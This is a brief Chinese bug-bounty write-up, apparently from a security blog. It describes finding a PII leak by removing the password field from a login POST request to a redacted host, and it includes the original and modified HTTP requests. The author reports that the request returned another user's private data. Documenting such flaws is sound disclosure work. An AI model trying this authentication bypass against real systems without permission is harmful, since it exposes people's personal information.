泄露PII的漏洞挖掘经历
什么是PII(Personal Identifiable Information)
个人可识别信息
这是有关一个人的数据,这些数据能帮助识别这个人,如姓名、指纹、电子邮件地址、电话号码等。
我使用提供的凭据进行测试,提交了我的用户名和密码并收到以下请求:
POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1 Host: redact.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 25 Origin: redact.com Referer: redact.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close
{"login":"test@gmail.com, "password": "test1337"}
我从请求中删除了密码字段及其值,如下:
POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1 Host: redact.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 25 Origin: redact.com Referer: redact.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close
{"login":"test@gmail.com"}
然后该用户的 PII 被泄露,并且显示了私人信息。
这是我收到的返回包:
有时,您需要尝试输入字段并处理一些意外行为。这就是为什么执行手动测试很重要,而不仅仅是依赖模糊测试,这可能会对网站造成损害。
获取更多资讯请加入交流群
版权说明
本文地址:http://kirinbk.cn/post-1190.html
免责声明:本站文章仅用于科普及教育用途,远离犯罪!
发表评论